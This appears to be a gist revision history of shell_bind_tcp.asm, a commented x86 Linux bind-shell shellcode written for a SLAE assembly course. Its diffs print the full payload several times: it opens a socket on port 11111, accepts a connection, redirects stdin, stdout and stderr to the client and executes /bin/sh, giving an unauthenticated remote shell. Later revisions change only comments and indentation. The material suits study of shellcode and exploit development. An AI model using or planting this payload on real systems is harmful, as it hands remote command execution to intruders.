geyslan · October 7, 2023 10:00 · May 26, 2018 · Mar 16, 2013 · Mar 16, 2013 · Mar 16, 2013
diff --git a/shell_bind_tcp.asm b/shell_bind_tcp.asm
@@ -1,4 +1,4 @@
-; The original file of this snippet is in https://github.com/geyslan/SLAE/blob/master/1st.assignment/shell_bind_tcp.asm
+; This is a snippet of the original file in https://github.com/geyslan/SLAE/blob/master/1st.assignment/shell_bind_tcp.asm
 
 global _start
 

diff --git a/shell_bind_tcp.asm b/shell_bind_tcp.asm
@@ -1,4 +1,4 @@
-; The updated version of this file is in https://github.com/geyslan/SLAE/blob/master/1st.assignment/shell_bind_tcp.asm
+; The original file of this snippet is in https://github.com/geyslan/SLAE/blob/master/1st.assignment/shell_bind_tcp.asm
 
 global _start
 

diff --git a/shell_bind_tcp.asm b/shell_bind_tcp.asm
@@ -106,7 +106,7 @@ _start:
 	mov edx, eax		; saving the returned socket fd (client)
 
 
-	; Creating a interchangeably copy of the 3 file descriptors (stdin, stdout, errno)
+	; Creating a interchangeably copy of the 3 file descriptors (stdin, stdout, stderr)
 	; int dup2(int oldfd, int newfd);
 	; dup2(clientfd, ...)
 
@@ -122,7 +122,7 @@ _start:
         int 0x80
 
         mov eax, 63
-        mov ecx, 2		; errno file descriptor
+        mov ecx, 2		; stderr file descriptor
 
         int 0x80
 

diff --git a/shell_bind_tcp.asm b/shell_bind_tcp.asm
@@ -1,3 +1,5 @@
+; The updated version of this file is in https://github.com/geyslan/SLAE/blob/master/1st.assignment/shell_bind_tcp.asm
+
 global _start
 
 section .text

diff --git a/shell_bind_tcp.asm b/shell_bind_tcp.asm
@@ -4,140 +4,140 @@ section .text
 
 _start:
 
-; syscalls (/usr/include/asm/unistd_32.h)
-; socketcall numbers (/usr/include/linux/net.h)
+	; syscalls (/usr/include/asm/unistd_32.h)
+	; socketcall numbers (/usr/include/linux/net.h)
 
-; Creating the socket file descriptor
-; int socket(int domain, int type, int protocol);
-; socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
+	; Creating the socket file descriptor
+	; int socket(int domain, int type, int protocol);
+	; socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
 
-mov eax, 102	; syscall 102 - socketcall
-mov ebx, 1	; socketcall type (sys_socket 1)
+	mov eax, 102		; syscall 102 - socketcall
+	mov ebx, 1		; socketcall type (sys_socket 1)
 
-; socket arguments (bits/socket.h, netinet/in.h)
-push 0	; IPPROTO_IP = 0 (int)
-push 1	; SOCK_STREAM = 1 (int)
-push 2	; AF_INET = 2 (int)
+	; socket arguments (bits/socket.h, netinet/in.h)
+	push 0			; IPPROTO_IP = 0 (int)
+	push 1			; SOCK_STREAM = 1 (int)
+	push 2			; AF_INET = 2 (int)
 
-mov ecx, esp	; ptr to argument array
+	mov ecx, esp		; ptr to argument array
 
-int 0x80	; kernel interruption
+	int 0x80		; kernel interruption
 
-mov edx, eax	; saving the returned socket file descriptor
+	mov edx, eax		; saving the returned socket file descriptor
 
 
-; Avoiding SIGSEGV when trying to reconnect before the kernel to close the socket previously opened
-; this problem happens in most shellcodes, even in the Metasploit, because they do not care
-; about the reuse of the socket address
-; int setsockopt(int sockfd, int level, int optname, const void *optval, socklen_t optlen);
-; setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &socklen_t, socklen_t)
+	; Avoiding SIGSEGV when trying to reconnect before the kernel to close the socket previously opened
+	; this problem happens in most shellcodes, even in the Metasploit, because they do not care
+	; about the reuse of the socket address
+	; int setsockopt(int sockfd, int level, int optname, const void *optval, socklen_t optlen);
+	; setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &socklen_t, socklen_t)
 
-        mov eax, 102	; syscall 102 - socketcall
-        mov ebx, 14	; socketcall type (sys_setsockopt 14)
+        mov eax, 102		; syscall 102 - socketcall
+        mov ebx, 14		; socketcall type (sys_setsockopt 14)
 
-        push 4 ; sizeof socklen_t
-        push esp ; address of socklen_t - on the stack
-        push 2 ; SO_REUSEADDR = 2
-        push 1 ; SOL_SOCKET = 1
-        push edx ; sockfd
+        push 4                  ; sizeof socklen_t
+        push esp                ; address of socklen_t - on the stack
+        push 2                  ; SO_REUSEADDR = 2
+        push 1                  ; SOL_SOCKET = 1
+        push edx                ; sockfd
 
-        mov ecx, esp	; ptr to argument array
+        mov ecx, esp		; ptr to argument array
 
-        int 0x80	; kernel interrupt
+        int 0x80		; kernel interrupt
 
 
-; Biding the socket with an address type
-; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
-; bind(sockfd, [AF_INET, 11111, INADDR_ANY], 16)
+	; Biding the socket with an address type
+	; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
+	; bind(sockfd, [AF_INET, 11111, INADDR_ANY], 16)
 
-mov eax, 102	; syscall 102 - socketcall
-mov ebx, 2	; socketcall type (sys_bind 2)
+	mov eax, 102		; syscall 102 - socketcall
+	mov ebx, 2		; socketcall type (sys_bind 2)
 
-; building the sockaddr_in struct (sys/socket.h, netinet/in.h and bits/sockaddr.h)
-push 0	; INADDR_ANY = 0 (uint32_t)
-push WORD 0x672b	; port in byte reverse order = 11111 (uint16_t)
-push WORD 2	; AF_INET = 2 (unsigned short int)
-mov ecx, esp	; struct pointer
+	; building the sockaddr_in struct (sys/socket.h, netinet/in.h and bits/sockaddr.h)
+	push 0			; INADDR_ANY = 0 (uint32_t)
+	push WORD 0x672b	; port in byte reverse order = 11111 (uint16_t)
+	push WORD 2		; AF_INET = 2 (unsigned short int)
+	mov ecx, esp		; struct pointer
 
-; bind arguments (sys/socket.h)
-push 16	; sockaddr struct size = sizeof(struct sockaddr) = 16 (socklen_t)
-push ecx	; sockaddr_in struct pointer (struct sockaddr *)
-push edx	; socket fd (int)
+	; bind arguments (sys/socket.h)
+	push 16			; sockaddr struct size = sizeof(struct sockaddr) = 16 (socklen_t)
+	push ecx		; sockaddr_in struct pointer (struct sockaddr *)
+	push edx		; socket fd (int)
 
-mov ecx, esp	; ptr to argument array
+	mov ecx, esp		; ptr to argument array
 
-int 0x80	; kernel interrruption
+	int 0x80		; kernel interrruption
 
 
-; Preparing to listen the incoming connection (passive socket)
-; int listen(int sockfd, int backlog);
-; listen(sockfd, 0);
+	; Preparing to listen the incoming connection (passive socket)
+	; int listen(int sockfd, int backlog);
+	; listen(sockfd, 0);
 
-mov eax, 102	; syscall 102 - socketcall
-mov ebx, 4	; socketcall type (sys_listen 4)
+	mov eax, 102		; syscall 102 - socketcall
+	mov ebx, 4		; socketcall type (sys_listen 4)
 
-; listen arguments
-push 0	; backlog (connections queue size)
-push edx	; socket fd
+	; listen arguments
+	push 0			; backlog (connections queue size)
+	push edx		; socket fd
 
-mov ecx, esp	; ptr to argument array
+	mov ecx, esp		; ptr to argument array
 
-int 0x80	; kernel interruption
+	int 0x80		; kernel interruption
 
 
-; Accepting the incoming connection
-; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
-; accept(sockfd, NULL, NULL)
+	; Accepting the incoming connection
+	; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
+	; accept(sockfd, NULL, NULL)
 
-        mov eax, 102 ; syscall 102 - socketcall
-        mov ebx, 5 ; socketcall type (sys_accept 5)
+        mov eax, 102            ; syscall 102 - socketcall
+        mov ebx, 5              ; socketcall type (sys_accept 5)
 
-; accept arguments
-push 0	; NULL - we don't need to know anything about the client
-push 0	; NULL - we don't need to know anything about the client
-push edx	; socket fd
+	; accept arguments
+	push 0			; NULL - we don't need to know anything about the client
+	push 0			; NULL - we don't need to know anything about the client
+	push edx		; socket fd
 
-mov ecx, esp	; ptr to argument array
+	mov ecx, esp		; ptr to argument array
 
-int 0x80	; kernel interruption
+	int 0x80		; kernel interruption
 
-mov edx, eax	; saving the returned socket fd (client)
+	mov edx, eax		; saving the returned socket fd (client)
 
 
-; Creating a interchangeably copy of the 3 file descriptors (stdin, stdout, errno)
-; int dup2(int oldfd, int newfd);
-; dup2(clientfd, ...)
+	; Creating a interchangeably copy of the 3 file descriptors (stdin, stdout, errno)
+	; int dup2(int oldfd, int newfd);
+	; dup2(clientfd, ...)
 
-mov eax, 63	; syscall 63 - dup2
-mov ebx, edx	; oldfd (client socket fd)
-mov ecx, 0	; stdin file descriptor
+	mov eax, 63		; syscall 63 - dup2
+	mov ebx, edx		; oldfd (client socket fd)
+	mov ecx, 0		; stdin file descriptor
 
-int 0x80	; kernel interruption
+	int 0x80		; kernel interruption
 
         mov eax, 63
-        mov ecx, 1	; stdout file descriptor
+        mov ecx, 1		; stdout file descriptor
 
         int 0x80
 
         mov eax, 63
-        mov ecx, 2	; errno file descriptor
+        mov ecx, 2		; errno file descriptor
 
         int 0x80
 
 
-; Finally, using execve to substitute the actual process with /bin/sh
-; int execve(const char *filename, char *const argv[], char *const envp[]);
-; exevcve("/bin/sh", NULL, NULL)
+	; Finally, using execve to substitute the actual process with /bin/sh
+	; int execve(const char *filename, char *const argv[], char *const envp[]);
+	; exevcve("/bin/sh", NULL, NULL)
 
-mov eax, 11	; execve syscall
+	mov eax, 11		; execve syscall
 
-; execve string argument
-push 0	; null byte
-push 0x68732f2f	; "//sh"
-push 0x6e69622f	; "/bin"
+	; execve string argument
+	push 0			; null byte
+	push 0x68732f2f		; "//sh"
+	push 0x6e69622f		; "/bin"
 
-mov ebx, esp	; ptr to "/bin//sh" string
-mov ecx, 0	; null ptr to argv
-mov edx, 0	; null ptr to envp
+	mov ebx, esp		; ptr to "/bin//sh" string
+	mov ecx, 0		; null ptr to argv
+	mov edx, 0		; null ptr to envp
 
-int 0x80	; bingo
+	int 0x80		; bingo
diff --git a/shell_bind_tcp.asm b/shell_bind_tcp.asm
@@ -0,0 +1,143 @@
+global _start
+
+section .text
+
+_start:
+
+; syscalls (/usr/include/asm/unistd_32.h)
+; socketcall numbers (/usr/include/linux/net.h)
+
+; Creating the socket file descriptor
+; int socket(int domain, int type, int protocol);
+; socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
+
+mov eax, 102	; syscall 102 - socketcall
+mov ebx, 1	; socketcall type (sys_socket 1)
+
+; socket arguments (bits/socket.h, netinet/in.h)
+push 0	; IPPROTO_IP = 0 (int)
+push 1	; SOCK_STREAM = 1 (int)
+push 2	; AF_INET = 2 (int)
+
+mov ecx, esp	; ptr to argument array
+
+int 0x80	; kernel interruption
+
+mov edx, eax	; saving the returned socket file descriptor
+
+
+; Avoiding SIGSEGV when trying to reconnect before the kernel to close the socket previously opened
+; this problem happens in most shellcodes, even in the Metasploit, because they do not care
+; about the reuse of the socket address
+; int setsockopt(int sockfd, int level, int optname, const void *optval, socklen_t optlen);
+; setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &socklen_t, socklen_t)
+
+        mov eax, 102	; syscall 102 - socketcall
+        mov ebx, 14	; socketcall type (sys_setsockopt 14)
+
+        push 4 ; sizeof socklen_t
+        push esp ; address of socklen_t - on the stack
+        push 2 ; SO_REUSEADDR = 2
+        push 1 ; SOL_SOCKET = 1
+        push edx ; sockfd
+
+        mov ecx, esp	; ptr to argument array
+
+        int 0x80	; kernel interrupt
+
+
+; Biding the socket with an address type
+; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
+; bind(sockfd, [AF_INET, 11111, INADDR_ANY], 16)
+
+mov eax, 102	; syscall 102 - socketcall
+mov ebx, 2	; socketcall type (sys_bind 2)
+
+; building the sockaddr_in struct (sys/socket.h, netinet/in.h and bits/sockaddr.h)
+push 0	; INADDR_ANY = 0 (uint32_t)
+push WORD 0x672b	; port in byte reverse order = 11111 (uint16_t)
+push WORD 2	; AF_INET = 2 (unsigned short int)
+mov ecx, esp	; struct pointer
+
+; bind arguments (sys/socket.h)
+push 16	; sockaddr struct size = sizeof(struct sockaddr) = 16 (socklen_t)
+push ecx	; sockaddr_in struct pointer (struct sockaddr *)
+push edx	; socket fd (int)
+
+mov ecx, esp	; ptr to argument array
+
+int 0x80	; kernel interrruption
+
+
+; Preparing to listen the incoming connection (passive socket)
+; int listen(int sockfd, int backlog);
+; listen(sockfd, 0);
+
+mov eax, 102	; syscall 102 - socketcall
+mov ebx, 4	; socketcall type (sys_listen 4)
+
+; listen arguments
+push 0	; backlog (connections queue size)
+push edx	; socket fd
+
+mov ecx, esp	; ptr to argument array
+
+int 0x80	; kernel interruption
+
+
+; Accepting the incoming connection
+; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
+; accept(sockfd, NULL, NULL)
+
+        mov eax, 102 ; syscall 102 - socketcall
+        mov ebx, 5 ; socketcall type (sys_accept 5)
+
+; accept arguments
+push 0	; NULL - we don't need to know anything about the client
+push 0	; NULL - we don't need to know anything about the client
+push edx	; socket fd
+
+mov ecx, esp	; ptr to argument array
+
+int 0x80	; kernel interruption
+
+mov edx, eax	; saving the returned socket fd (client)
+
+
+; Creating a interchangeably copy of the 3 file descriptors (stdin, stdout, errno)
+; int dup2(int oldfd, int newfd);
+; dup2(clientfd, ...)
+
+mov eax, 63	; syscall 63 - dup2
+mov ebx, edx	; oldfd (client socket fd)
+mov ecx, 0	; stdin file descriptor
+
+int 0x80	; kernel interruption
+
+        mov eax, 63
+        mov ecx, 1	; stdout file descriptor
+
+        int 0x80
+
+        mov eax, 63
+        mov ecx, 2	; errno file descriptor
+
+        int 0x80
+
+
+; Finally, using execve to substitute the actual process with /bin/sh
+; int execve(const char *filename, char *const argv[], char *const envp[]);
+; exevcve("/bin/sh", NULL, NULL)
+
+mov eax, 11	; execve syscall
+
+; execve string argument
+push 0	; null byte
+push 0x68732f2f	; "//sh"
+push 0x6e69622f	; "/bin"
+
+mov ebx, esp	; ptr to "/bin//sh" string
+mov ecx, 0	; null ptr to argv
+mov edx, 0	; null ptr to envp
+
+int 0x80	; bingo
No results found